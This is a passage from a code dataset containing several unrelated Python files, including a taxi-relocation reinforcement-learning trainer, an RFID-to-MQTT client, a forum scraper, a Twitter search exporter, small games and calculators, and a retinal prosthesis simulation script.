heatmap_score","sub_path":"Gated_Transfomer_Network/module/for_MTS/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"416526740","text":"# Xinwu Qian 2019-02-06\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\r\n# This implements independent q learning approach\r\nuse_gpu = 1\r\nimport os\r\nimport config\r\nimport time\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport network\r\nimport 
env_agent\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\nimport json\r\nimport glob\r\n\r\nplt.ion()\r\nplt.figure(1,figsize=(10, 6))\r\nimport demand_gen\r\n\r\nnp.set_printoptions(precision=2)\r\nif use_gpu == 0:\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\n\r\n# force on gpu\r\nconfig1 = tf.ConfigProto()\r\nconfig1.gpu_options.allow_growth = True\r\n\r\nfilename='log/IDRQN_reward_log_' + datetime.now().strftime('%Y-%m-%d %H-%M-%S')\r\nreward_out = open(filename + '.csv', 'w+')\r\nconfigout={'NET':config.NET_CONFIG,'TRAIN':config.TRAIN_CONFIG,'SIMU':config.SIMULATION_CONFIG}\r\njson.dump(configout, open(filename+'.json',\"w\"))\r\n#set rng seed\r\nnp.random.seed(config.TRAIN_CONFIG['random_seed'])\r\n\r\nmain_env=env_agent.env_agent()\r\nN_station=main_env.N_station\r\n\r\n#tf session initialiaze\r\nmain_env.create_session()\r\n#stand agent creation\r\nmain_env.create_stand_agent()\r\nglobal_init = tf.global_variables_initializer()\r\nmain_env.sess.run(global_init)\r\nsaver = tf.train.Saver(max_to_keep=5)\r\ndistance=main_env.distance\r\n\r\nilist=[]\r\nrlist=[]\r\nrlist_relo=[]\r\nrlist_wait=[]\r\n\r\nfor i in range(main_env.num_episodes):\r\n main_env.initialize_episode()\r\n # return the current state of the system\r\n sP, tempr, featurep,score,tr2 =main_env.env.get_state()\r\n # process the state into a list\r\n # replace the state action with future states\r\n feature=featurep\r\n s = network.processState(sP, N_station)\r\n pres=s\r\n prea=np.zeros((N_station))\r\n\r\n within_frame_reward = 0\r\n frame_skipping = 1\r\n rAll = 0\r\n rAll_unshape=0\r\n j = 0\r\n total_serve = 0\r\n total_leave = 0\r\n prediction_time=0\r\n targetz_time=0\r\n training_time=0\r\n buffer_count=0;\r\n tinit=time.time()\r\n\r\n #bandit swapping scheme\r\n\r\n while j < main_env.max_epLength:\r\n tall=time.time()\r\n j += 1\r\n hour=j//config.TRAIN_CONFIG['hour_length']\r\n tick=hour/(config.TRAIN_CONFIG['max_epLength']/config.TRAIN_CONFIG['hour_length'])\r\n main_env.tick=tick\r\n a1,a2,initial_rnn_state = main_env.take_action([s],feature,j,tick) #a1 determines if relocate or not, a2 determines which station to relocate\r\n #a,invalid_action=main_env.take_action(feature,[s],j,tick)\r\n if config.TRAIN_CONFIG['use_tracker']:\r\n main_env.sys_tracker.record(s, a2)\r\n # move to the next step based on action selected\r\n ssp, lfp = main_env.env.step(a2)\r\n total_serve += ssp\r\n total_leave += lfp\r\n # get state and reward\r\n s1P, r, featurep,score,r2 = main_env.env.get_state()\r\n s1 = network.processState(s1P, main_env.N_station)\r\n vehicle_available=[0]*N_station; #0 means no vehicle available after the transition, 1 means available\r\n for k in range(N_station):\r\n if main_env.env.taxi_in_q[k]: vehicle_available[k]=1\r\n\r\n new_rnn, _ = main_env.measure_rnn([s1],j,[[tick]],[np.array([main_env.e])],1,1)\r\n bs_mask= main_env.bs_mask\r\n #record buffer\r\n #smaller e value\r\n main_env.epsilon_decay()\r\n #buffer record\r\n newr=r*np.ones((main_env.N_station))\r\n v1=np.reshape(np.array([s, a2, newr, s1,feature,score,featurep,main_env.e,tick,a1,new_rnn[0],vehicle_available,bs_mask]), [1,13])\r\n v2=np.reshape(np.array([feature,a2,score]),[1,3]) #bandit state to record\r\n main_env.buffer_record(v1,v2)\r\n main_env.process_bandit_buffer(20)\r\n main_env.train_agent()\r\n\r\n rAll += r\r\n rAll_unshape+=r2\r\n # swap state\r\n s = s1\r\n sP = s1P\r\n reloP=a1\r\n sa=a2 #past action\r\n feature=featurep\r\n #preocess bandit buffer\r\n print('Confidence 
bound:',main_env.linucb_agent.return_upper_bound(feature))\r\n #main_env.process_bandit_buffer()\r\n main_env.sys_tracker.record_time(main_env.env)\r\n regret,arm_err=main_env.bandit_regret()\r\n main_env.update_bandit()\r\n print('the regret of this round is:',regret,' max_err:',max(arm_err))\r\n ilist.append(i)\r\n rlist.append(rAll); rlist_relo.append(rAll_unshape[2]);rlist_wait.append(rAll_unshape[1])\r\n plt.clf()\r\n plt.plot(ilist,rlist, marker='o', markerfacecolor='blue', markersize=4, color='skyblue', linewidth=4,label='totalreward')\r\n # plt.plot(ilist,rlist_relo,marker='d', color='red', linewidth=2,label='relocation')\r\n # plt.plot(ilist,rlist_wait, marker='s', color='red', linewidth=2, linestyle='dashed', label=\"wait\")\r\n plt.xlabel('Episode')\r\n plt.legend()\r\n plt.pause(0.01)\r\n print('Episode:', i, ', totalreward:', rAll, ', old reward:',rAll_unshape,', total serve:', total_serve, ', total leave:', total_leave, ', total_cpu_time:',time.time()-tinit,\r\n ', terminal_taxi_distribution:', [len(v) for v in main_env.env.taxi_in_q], ', terminal_passenger:',\r\n [len(v) for v in main_env.env.passenger_qtime], main_env.e,main_env.eliminate_threshold)\r\n reward_out.write(str(i) + ',' + str(rAll) + '\\n')\r\n # if i>0:\r\n # print('Max relo norm:',max(main_env.relo_nornm), 'Mean relo norm:',np.mean(main_env.relo_nornm))\r\n # print('Max act norm:', max(main_env.act_norm), 'Mean act norm:', np.mean(main_env.act_norm))\r\n # Periodically save the model.\r\n # if i % 15 == 0 and i != 0:\r\n # saver.save(main_env.sess, main_env.path + '/model-' + str(i) + '.cptk')\r\n # print(\"Saved Model\")\r\n\r\n# summaryLength,h_size,sess,mainQN,time_per_step)\r\n# saver.save(sess,path+'/model-'+str(i)+'.cptk')\r\nmain_env.sys_tracker.save('IDRQN')\r\nmain_env.sys_tracker.playback(-1)\r\nreward_out.close()\r\n","sub_path":"Model_C51_compact/new_IDRQN_main.py","file_name":"new_IDRQN_main.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571262553","text":"from .simboloVirtual import SimboloVirtual\r\nfrom .simboloBase import SimboloBase\r\nfrom azoe.engine import EventHandler\r\nfrom azoe.widgets import ContextMenu\r\nfrom pygame import mouse, Surface\r\n\r\n\r\nclass MetaSimbolo(SimboloBase):\r\n \"\"\"Metaclass to avoid repeating onMouseOver\"\"\"\r\n copia = None\r\n image = None\r\n\r\n def on_mouse_over(self):\r\n if self.pressed:\r\n x, y = mouse.get_pos()\r\n z = self.z\r\n pos = x, y, z\r\n dx, dy = self._arrastrar()\r\n if dx != 0 or dy != 0:\r\n self.data['colisiones'] = self.img_cls\r\n self.data['cols_code'] = self.cls_code\r\n self.copia = SimboloVirtual(self, self.image.copy(), pos, self.data)\r\n EventHandler.set_focus(self.copia)\r\n self.pressed = False\r\n else:\r\n pass # showTooltip()\r\n\r\n def imagen_positiva(self):\r\n self.image = self.img_pos\r\n\r\n def imagen_negativa(self):\r\n if self.img_cls is not None:\r\n img = self.img_cls.copy()\r\n img.blit(self.img_neg, (0, 0), special_flags=6)\r\n self.image = img\r\n else:\r\n img = Surface(self.image.get_size())\r\n img.set_alpha(0)\r\n self.image = img\r\n\r\n def renombrar(self, texto):\r\n self._nombre = texto\r\n self.nombre = self.parent.nombre + '.Simbolo.' 
+ self._nombre\r\n self.data['nombre'] = texto\r\n\r\n\r\nclass SimboloSimple(MetaSimbolo):\r\n copiar = False\r\n\r\n def __init__(self, parent, data):\r\n super().__init__(parent, data)\r\n self.img_pos = self._imagen.copy()\r\n self.img_neg = self._crear_transparencia(self._imagen.copy())\r\n self.image = self.img_pos\r\n self.context = ContextMenu(self)\r\n\r\n\r\nclass SimboloMultiple(MetaSimbolo):\r\n rot_idxs = {}\r\n curr_rot = 0\r\n\r\n def __init__(self, parent, data):\r\n self.imgs_pos = self.cargar_anims(data['imagenes'], ['S', 'I', 'D'])\r\n self.imgs_neg = self.cargar_anims(data['imagenes'], ['S', 'I', 'D'], True)\r\n data['image'] = self.imgs_pos['Sabajo']\r\n self.curr_rot = 0\r\n super().__init__(parent, data)\r\n self.img_pos = self.imgs_pos['Sabajo']\r\n self.img_neg = self.imgs_neg['Sabajo']\r\n self.image = self.img_pos\r\n\r\n cmds = [\r\n {'nom': \"Abajo\", 'cmd': lambda: self.cambiar_imagen('abajo')},\r\n {'nom': \"Arriba\", 'cmd': lambda: self.cambiar_imagen('arriba')},\r\n {'nom': \"Derecha\", 'cmd': lambda: self.cambiar_imagen('derecha')},\r\n {'nom': \"Izquierda\", 'cmd': lambda: self.cambiar_imagen('izquierda')}]\r\n\r\n self.context = ContextMenu(self, cmds)\r\n\r\n def cambiar_imagen(self, direccion):\r\n self.img_pos = self.imgs_pos['S' + direccion]\r\n self.img_neg = self.imgs_neg['S' + direccion]\r\n self.curr_rot = self.rot_idxs['S' + direccion]\r\n self.image = self.img_pos\r\n self.data['image'] = self.image\r\n self.data['rot'] = self.curr_rot\r\n\r\n def cargar_anims(self, spritesheet, seq, alpha=False):\r\n dicc, keys = {}, []\r\n dires = ['abajo', 'arriba', 'izquierda', 'derecha']\r\n\r\n for L in seq:\r\n for D in dires:\r\n keys.append(L + D)\r\n\r\n for key in keys:\r\n idx = keys.index(key)\r\n if not alpha:\r\n dicc[key] = spritesheet[idx]\r\n self.rot_idxs[key] = idx\r\n else:\r\n dicc[key] = self._crear_transparencia(spritesheet[idx])\r\n return dicc\r\n","sub_path":"rundata/simbolos/simboloPanel.py","file_name":"simboloPanel.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487275764","text":"#Lose By Playing 2,5\nimport random\np1dice = 5\np2dice = 5\np1sum = 0\np2sum = 0\n\ndef roll_decide():\n roll = random.randint(1,6)\n if roll == 2 or roll ==5:\n return \"lose\"\n else:\n print(roll)\n return roll\ndef play():\n global p1dice, p2dice, p1sum, p2sum\n while p1dice >= 1:\n curr = roll_decide()\n if curr == \"lose\":\n print(\"You lost a dice\")\n p1dice-=1\n else:\n p1sum+=curr\n print(\"Player 1 Score:\",p1sum)\n while p2dice >= 1:\n curr = roll_decide()\n if curr == \"lose\":\n print(\"You lost a dice\")\n p2dice-=1\n else:\n p2sum+=curr\n print(\"Player 2 Score:\",p2sum)\nplay()\n","sub_path":"stuck_in_the_mud.py","file_name":"stuck_in_the_mud.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159390712","text":"import os\nimport time\nimport sys\nimport serial \nimport paho.mqtt.client as mqtt\nimport paho.mqtt.publish as publish\nfrom config import Config\nfrom models.rfCards import *\nimport threading\nallLoc=LocationDetails.query.all() \nallLoc=allLoc[0] if allLoc else {id:None}\n\n\ndef mqttProcess():\n\n def on_log(client, userdata, level, buf):\n print (\"This is the buffer {}\".format(buf))\n\n\n def on_publish(client, obj, mid):\n print(\"This is the mid In on Pub call back: \" + str(mid))\n\n def on_message(client, userdata, msg):\n print (\"######################\")\n 
print (\"Topic: \", msg.topic + ' Message: ' + str(msg.payload))\n print (\"######################\")\n\n\n def read_rfid(): \n ser = serial.Serial (\"/dev/ttyUSB0\") #Open named port \n ser.baudrate = 9600 #Set baud rate to 9600\n data = ser.read(12) #Read 12 characters from serial port to data\n ser.close() #Close port \n return {\"data\":data,\"status\":200} \n\n def start(): \n while(1): \n data=read_rfid()\n if (data.get(\"status\",False)):\n print (\"Data insude \",data[\"data\"],Config.CLIENT_topic.format(allLoc.id)) \n client.publish(Config.CLIENT_topic.format(allLoc.id),data[\"data\"], qos=2, retain=False) \n else:\n print(\"data not received \")\n \n def on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \" + str(rc))\n print (\"Making Default Values____________________________________________________\")\n client.subscribe(\"/home/rfid/#\")\n threading.Thread(target=start).start()\n \n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.on_publish = on_publish\n client.on_log = on_log\n client.tls_set('/etc/ssl/certs/ca-certificates.crt',tls_version=2)\n client.username_pw_set(Config.CLIENT_username,Config.CLIENT_password)\n client.connect(Config.HOSTNAME, Config.CLIENT_port, 60)\n client.loop_forever()\n\nmqttProcess()","sub_path":"clientMqtt.py","file_name":"clientMqtt.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351668776","text":"\"\"\"\nAuthor: Dominik Rumian\n2019-03-30\n\nSimple calculator for combination numbers working in GUI mode\n\"\"\"\n\nfrom tkinter import *\n\n\ndef factorial(n):\n \"\"\"\n Computes factorial of given number\n :param n: number of which factorial should be computed\n :return: factorial of n\n \"\"\"\n if n == 0:\n return 1\n else:\n return n * factorial(n - 1)\n\n\ndef multiplication_line(start, end):\n \"\"\"\n Multiplicates numbers from start to end like:\n (start) * (start - 1) * .... * (start - k) * (end)\n :param start: starting point\n :param end: ending point\n :return: returns product of described line\n \"\"\"\n product = start\n for i in range(start - 1, end - 1, -1):\n product *= i\n return product\n\n\ndef calculate_comb_num(n, k):\n \"\"\"\n Computes the value of combination number determined by given 'n' and 'k'\n :param n:\n :param k:\n :return: value of combination number, -1 if input doesn't meet the conditions for comb. 
num\n \"\"\"\n if k > n:\n return -1\n if k == 0:\n return 1\n out_n = multiplication_line(n, n - k + 1)\n out_k = factorial(k)\n return out_n / out_k\n\n\ndef compute():\n \"\"\"\n Performs computation using GUI\n :return:\n \"\"\"\n n = int(n_box.get())\n k = int(k_box.get())\n\n com_num_val = calculate_comb_num(n, k)\n\n result.delete('1.0', END)\n\n if com_num_val == -1:\n result.insert(END, \"Please enter numbers\\nfrom interval\\n'n >= k >= 0'\")\n else:\n result.insert(END, \"%d\" % com_num_val)\n\n\n\"\"\"\nGUI for the calculator\n\"\"\"\n# Creating GUI\nwindow = Tk()\nwindow.title(\"Combination numbers calculator\")\nwindow.geometry(\"320x240\")\n\n# Frames\n# Frames create individual boxes, into we can input out buttons, entries etc.\n# relative to each other, not relative to whole window\ninput_variables = Frame(window)\ninput_variables.grid(row=0, column=0, sticky=W)\n\nbuttons = Frame(window)\nbuttons.grid(row=1, column=0, sticky=W)\n\nresults = Frame(window)\nresults.grid(row=2, column=0, sticky=W)\n\n# Labels\nLabel(input_variables, text=\"n:\").grid(row=0, column=0, sticky=W)\nLabel(input_variables, text=\"k:\").grid(row=1, column=0, sticky=W)\n\nLabel(results, text=\"Result:\").grid(row=1, column=0, sticky=W)\n\n# Input boxes\nn_box = Entry(input_variables, width=20, bg=\"light grey\")\nn_box.grid(row=0, column=1, sticky=W)\n\nk_box = Entry(input_variables, width=20, bg=\"light grey\")\nk_box.grid(row=1, column=1, sticky=W)\n\n# Button\nButton(buttons, text=\"Compute\", width=6, command=compute).grid(row=0, column=0, sticky=W)\n\n# Output boxes\nresult = Text(results, width=22, height=5, bg=\"light gray\")\nresult.grid(row=2, column=0, sticky=W)\n\n# Looping\nwindow.mainloop()\n","sub_path":"Combination_numbers_calculator.py","file_name":"Combination_numbers_calculator.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164256579","text":"#!/usr/bin/env python3\n\nfrom urllib import request\nimport MySQLdb, _mysql_exceptions\nimport re\nfrom . import dbcfg\n\nclass Spider:\n def __init__(self, entry, path):\n self.entry = entry\n self.ROOT_URL = 'http://nashihou.net/'\n self.path = path\n\n def read_page(self, url):\n content = request.urlopen(url)\n return content.read().decode('gbk')\n\n def extract_tags_url_from_tag_page(self):\n page_content = self.read_page(self.entry)\n page_content = self.remove_Lf(page_content)\n pattern = re.compile('
    (.*?)
    ')\n result = re.search(pattern, page_content)\n if result:\n tags = result.group(1).strip().split('')\n urls = {}\n for tag in tags:\n title_pattern = re.compile('title=\"(.*?)\"')\n title = re.search(title_pattern, tag)\n href_pattern = re.compile('href=\"(.*?)\"')\n href = re.search(href_pattern, tag)\n if title and href:\n urls[title.group(1).strip()] = self.ROOT_URL+(href.group(1).strip().replace('amp;', '')+'&type=thread')\n\n return urls\n else:\n return None\n\n def extract_page_url_from_certain_tag(self, url):\n page_content = self.read_page(url)\n page_content = self.remove_Lf(page_content)\n #print(page_content, '')\n pattern = re.compile('
    1(.*?)
    ')\n items = re.findall(pattern, page_content)\n urls = [item.replace('amp;', '') for item in items]\n #print(urls, ' ')\n return urls\n\n def extract_page_from_certain_article(self, url):\n page_content = self.read_page(url)\n page_content = self.remove_Lf(page_content)\n title_pattern = re.compile('(.*?) .*?')\n title = re.search(title_pattern, page_content)\n pattern = re.compile('.*?(.*?)', re.DOTALL)\n article = re.search(pattern, page_content)\n if article:\n article = article.group(1).strip()\n pattern = re.compile('
    |(

    )')\n article = re.sub(pattern, '\\n', article)\n\n article = self.replace_img(article)\n\n #print(article, '')\n pattern = re.compile('(.*?)\\n(.*?)\\n(.*?)
    ', re.DOTALL)\n items = re.search(pattern, article)\n if items:\n title = self.remove_blank(title.group(1))\n date = self.remove_blank(items.group(1))\n where = self.remove_blank(items.group(2))\n content = self.remove_blank(items.group(3))\n self.save(title, date, where, content)\n else:\n print(url, \" \", 'something wrong')\n\n def save(self, title, date, where, content):\n title = title.replace(\"\\\"\", '')\n print(\"title: \", title)\n file = open(self.path + title + '.md', 'w', encoding='gbk')\n file.write(date + '\\n\\n')\n file.write(where + '\\n\\n')\n file.write(content)\n file.close()\n conn = MySQLdb.connect(host=dbcfg.hostname, user=dbcfg.user, passwd=dbcfg.password, port=dbcfg.port)\n cur = conn.cursor()\n conn.set_character_set('gbk')\n cur.execute('SET NAMES gbk;')\n cur.execute('SET CHARACTER SET gbk;')\n cur.execute('SET character_set_connection=gbk;')\n # database name\n conn.select_db(dbcfg.dbname)\n abstract = self.get_abstract(content)\n value = [title, abstract, (dbcfg.url + title + '.md')]\n try:\n cur.execute('insert into ' + dbcfg.tbname + ' values(%s,%s,%s)', value)\n except _mysql_exceptions.IntegrityError as error:\n cur.execute('update ' + dbcfg.tbname+' set abstract = %s, url = %s where title = %s', (value[1], value[2], value[0]))\n finally:\n cur.close()\n conn.commit()\n conn.close()\n\n def get_abstract(self, article):\n content = re.sub(re.compile('!\\[alt image\\]\\(.*?\\)'), '', article)\n length = 100\n content = content.replace('\\n', '').replace(\"\\\"\", '')\n abstract = content[: length if len(content) > length else len(content)]\n print(\"abstract \", abstract)\n \"\"\"\n start = 0\n for i in range(0, 5):\n end = start + length- len(abstract)\n abstract += article[start:(end if len(article) > end else len(article))]\n abstract = re.sub(re.compile('!\\[alt image\\]\\(.*?\\)'), '', abstract)\n abstract = re.sub(re.compile('!\\[alt image\\]\\(.*?'), '', abstract)\n abstract = re.sub(re.compile('!\\[alt image\\]'), '', abstract)\n abstract = re.sub(re.compile('!\\[alt.*?'), '', abstract)\n abstract = re.sub(re.compile('!\\[.*?'), '', abstract)\n abstract = re.sub(re.compile('!\\['), '', abstract)\n abstract = abstract.strip()\n if len(abstract) >= 100:\n break\n else:\n start = end\n \"\"\"\n return abstract\n def replace_img(self, article):\n img_pattern = re.compile('', re.DOTALL)\n img_items = re.findall(img_pattern, article)\n if img_pattern:\n pattern = re.compile('.*?')\n for item in img_items:\n article = re.sub(pattern, '\\n![alt image](' + self.ROOT_URL + item + ')\\n', article, 1)\n img_pattern = re.compile('', re.DOTALL)\n img_items = re.findall(img_pattern, article)\n if img_pattern:\n pattern = re.compile('.*?')\n for item in img_items:\n article = re.sub(pattern, '\\n![alt image](' + self.ROOT_URL + item + ')\\n', article, 1)\n return article\n\n def remove_blank(self, content):\n content = content.strip()\n content = re.sub(re.compile('  '), '', content)\n content = re.sub(re.compile(' '), '', content)\n content = re.sub(re.compile('  '), '', content)\n content = re.sub(re.compile('   '), '', content)\n content = re.sub(re.compile(''), '', content)\n content = re.sub(re.compile('"'), '\"', content)\n content = re.sub(re.compile(''), '', content)\n content = re.sub(re.compile(''), '', content)\n return content\n\n def remove_Lf(self, content):\n pattern = re.compile('\\n|\\r')\n return re.sub(pattern, '', content)\n\n def run(self):\n tag_urls = self.extract_tags_url_from_tag_page()\n #print(tag_urls, '')\n for key, tag in 
tag_urls.items():\n pages = self.extract_page_url_from_certain_tag(tag)\n for page in pages:\n article_urls = self.extract_urls_from_certain_tag(page)\n for article in article_urls:\n self.extract_page_from_certain_article(article)\n\n\n","sub_path":"Python/Spider/utils/scrapy.py","file_name":"scrapy.py","file_ext":"py","file_size_in_byte":7853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"51088371","text":"def updateQuery(query, last_id, resultType, timezone, subquery, users):\r\n \r\n # Define functions\r\n def nl():\r\n print ('')\r\n \r\n def trackUsers(dataset, users):\r\n \r\n if len(users) > 1:\r\n \r\n for user in users:\r\n \r\n response = dataset[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs',\r\n 'Enlace']][dataset['Usuario'] == user]\r\n \r\n if len(response) > 0:\r\n \r\n print (user, 'user has', len(response), 'matches.')\r\n \r\n result = response[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n result = result.sort_values(by='Fecha Publicación')\r\n \r\n result.to_csv(path_or_buf='1. Data/usuarios_y_keywords.csv', sep=',', header=False, index=False, mode='a')\r\n \r\n else:\r\n \r\n print (user, 'subquery has no matches!')\r\n \r\n elif len(users) == 1:\r\n \r\n user = users[0]\r\n \r\n response = dataset[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs',\r\n 'Enlace']][dataset['Usuario'] == user]\r\n \r\n if len(response) > 0:\r\n\r\n print (user, 'user has', len(response), 'matches.')\r\n\r\n result = response[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n result = result.sort_values(by='Fecha Publicación')\r\n \r\n result.to_csv(path_or_buf='1. Data/usuarios_y_keywords.csv', sep=',', header=False, index=False, mode='a')\r\n\r\n else:\r\n\r\n print (user, 'subquery has no matches!')\r\n \r\n else:\r\n \r\n pass\r\n \r\n \r\n alltweets = []\r\n \r\n # using max_id parameter\r\n try:\r\n statuses = t.search.tweets(q = query, result_type = resultType, count = 100, max_id=last_id)\r\n \r\n tweets = statuses['statuses']\r\n \r\n alltweets.extend(tweets)\r\n \r\n # Create oldest id\r\n oldest = alltweets[-1]['id'] - 1\r\n\r\n try:\r\n\r\n while len(statuses) > 0:\r\n\r\n statuses = t.search.tweets(q = query, result_type= resultType, count=100, max_id=oldest)\r\n tweets = statuses['statuses']\r\n alltweets.extend(tweets)\r\n oldest = alltweets[-1]['id'] - 1\r\n\r\n except TwitterHTTPError:\r\n\r\n print ('No more tweets')\r\n nl()\r\n\r\n print ('%s fue el total de tweets descargados.' 
% (len(alltweets)))\r\n nl()\r\n\r\n # Create information lists\r\n ids = [tweet['id_str'] for tweet in alltweets]\r\n fecha = [tweet['created_at'] for tweet in alltweets]\r\n textstatus = [tweet['text'] for tweet in alltweets]\r\n user = [tweet['user']['screen_name'] for tweet in alltweets]\r\n rts = [tweet['retweet_count'] for tweet in alltweets]\r\n favs = [tweet['favorite_count'] for tweet in alltweets]\r\n \r\n enlaces = []\r\n for item in ids:\r\n enlace = 'https://twitter.com/statuses/' + str(item)\r\n enlaces.append(enlace)\r\n \r\n buildata = {'Tweet': Series(textstatus), 'Usuario': Series(user), 'RTs': Series(rts), 'FAVs': Series(favs),\r\n 'Enlace': Series(enlaces), 'ids': Series(ids), 'fecha': Series(fecha)}\r\n \r\n dfdata = DataFrame(buildata)\r\n \r\n dfdata['Time'] = pandas.to_datetime(dfdata['fecha'], utc=True, box=False)\r\n local_tz = pytz.timezone(timezone)\r\n dfdata['UTC'] = [item.tz_localize('UTC') for item in dfdata['Time']]\r\n dfdata['New UTC'] = [item.tz_convert(local_tz) for item in dfdata['UTC']]\r\n \r\n # extract date time\r\n date_time = pandas.DatetimeIndex(dfdata['New UTC'])\r\n dfdata['Fecha Publicación'] = date_time.strftime('%Y-%m-%d %H:%M')\r\n \r\n # Sort values by date time\r\n newdf = dfdata.sort_values(by='Fecha Publicación')\r\n \r\n if len(subquery) > 1:\r\n \r\n for word in subquery:\r\n \r\n newdata = newdf[newdf['Tweet'].str.contains(word, flags = re.IGNORECASE)]\r\n \r\n if len(newdata) > 0:\r\n \r\n print (word, 'subquery has', len(newdata), 'matches.')\r\n \r\n trackdata = newdata[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n trackfile = trackdata.sort_values(by='Fecha Publicación')\r\n trackfile.to_excel(excel_writer = '1. Data/subquery_%s.xlsx' % word, header=True, index=False)\r\n \r\n userTrack = trackUsers(trackfile, users)\r\n nl()\r\n \r\n else:\r\n \r\n print (word, 'subquery has no matches!')\r\n nl()\r\n \r\n elif len(subquery) == 1:\r\n \r\n word = subquery[0]\r\n \r\n newdata = newdf[newdf['Tweet'].str.contains(word, flags = re.IGNORECASE)]\r\n \r\n if len(newdata) > 0:\r\n \r\n print (word, 'subquery has', len(newdata), 'matches.')\r\n \r\n trackdata = newdata[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n trackfile = trackdata.sort_values(by='Fecha Publicación')\r\n trackfile.to_excel(excel_writer = '1. Data/subquery_%s.xlsx' % word, header=True, index=False)\r\n \r\n userTrack = trackUsers(trackfile, users)\r\n nl()\r\n \r\n else:\r\n \r\n print (word, 'subquery has no matches!')\r\n nl()\r\n \r\n else:\r\n \r\n pass\r\n \r\n # new oldest\r\n newoldest = int(newdf['ids'].iloc[0]) - 1\r\n \r\n if len(newdf) <= 60000:\r\n \r\n # write excel file with all tweets\r\n excelFile = newdf[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n excelFile.to_excel(excel_writer = '1. Data/query_%s.xlsx' % query, header=True, index=False)\r\n \r\n else:\r\n \r\n csvFile = newdf[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n csvFile.to_csv(path_or_buf='1. 
Data/query_%s.csv' % query, sep=',', header=True, index=False)\r\n \r\n \r\n nl()\r\n print ('Last id', newoldest)\r\n\r\n \r\n except IndexError:\r\n\r\n print ('No more tweets before last id:', last_id)\r\n nl()","sub_path":"Twitterpy/RetrackKeywords.py","file_name":"RetrackKeywords.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477066960","text":"h, w = list(map(int, input().split()))\nS = []\nfor _ in range(h):\n s = input()\n S.append(s)\n\n\n# print(S)\nd = [(0, 0), (0, 1), (1, 0), (1, 1)]\nans = 0\nfor i in range(h-1):\n for j in range(w-1):\n cnt = 0\n # print(i, j)\n for (di, dj) in d:\n if S[i+di][j+dj] == '#':\n cnt += 1\n if cnt in [1, 3]:\n ans += 1\nprint(ans)\n","sub_path":"atcoder/ABC191C.py","file_name":"ABC191C.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237927919","text":"import pulse2percept as p2p\nfrom glob import glob\nimport sys\nimport numpy as np\nfrom os.path import split, splitext, join\n\ndef main():\n if len(sys.argv) < 3:\n print('Usage: ./robosapiens-images.py ')\n return\n\n # Model string\n pathstr = sys.argv[1]\n modelstr = sys.argv[2]\n preprocess = np.int(sys.argv[3])\n prestr = '-pre' if preprocess else ''\n \n rho = int(sys.argv[4]) if len(sys.argv) >= 5 else 100\n rhostr = 'rho%d-' % rho\n axlambda = int(sys.argv[5]) if len(sys.argv) >= 6 else 100\n lmbstr = ('lmb%d-' % axlambda) if modelstr == 'axonmap' else ''\n \n models = {\n 'scoreboard': p2p.models.ScoreboardModel,\n 'axonmap': p2p.models.AxonMapModel\n }\n \n # Set up the axon map model at a reasonable step size.\n # Might want to play with different values for rho/lambda:\n model = models[modelstr](xrange=(-25, 15), yrange=(-15, 15), xystep=0.5,\n engine='serial', rho=rho)\n if modelstr == 'axonmap':\n model.build(axlambda=axlambda, n_axons=1500)\n else:\n model.build()\n \n for file in glob(join(pathstr, '*.jpg')):\n print(file)\n # For each grid, generate the percept and store it in the list:\n path, fname = split(file)\n fstr, fext = splitext(fname)\n img = p2p.stimuli.ImageStimulus(file, as_gray=True)\n for n in np.arange(2, 18):\n gsize = (4 * n, 6 * n)\n # Make all implants span the same area on the retina, so we need to adjust\n # the electrode-to-electrode spacing depending on how many rows/columns in\n # the grid:\n spacing = 10000.0 / gsize[1]\n grid = p2p.implants.ElectrodeGrid(gsize, x=-1500, spacing=spacing, \n etype=p2p.implants.DiskElectrode, r=100)\n implant = p2p.implants.ProsthesisSystem(grid)\n if preprocess:\n implant.stim = img.filter('median').filter('sobel').resize(gsize)\n else:\n implant.stim = img.resize(gsize)\n percept = model.predict_percept(implant)\n pfname = join(path, 'percepts', '%s-%s%s-%s%s%dx%d%s' % (fstr, modelstr, prestr, rhostr, lmbstr, *gsize, fext))\n percept.save(pfname, shape=img.img_shape)\n \n\nif __name__ == \"__main__\":\n 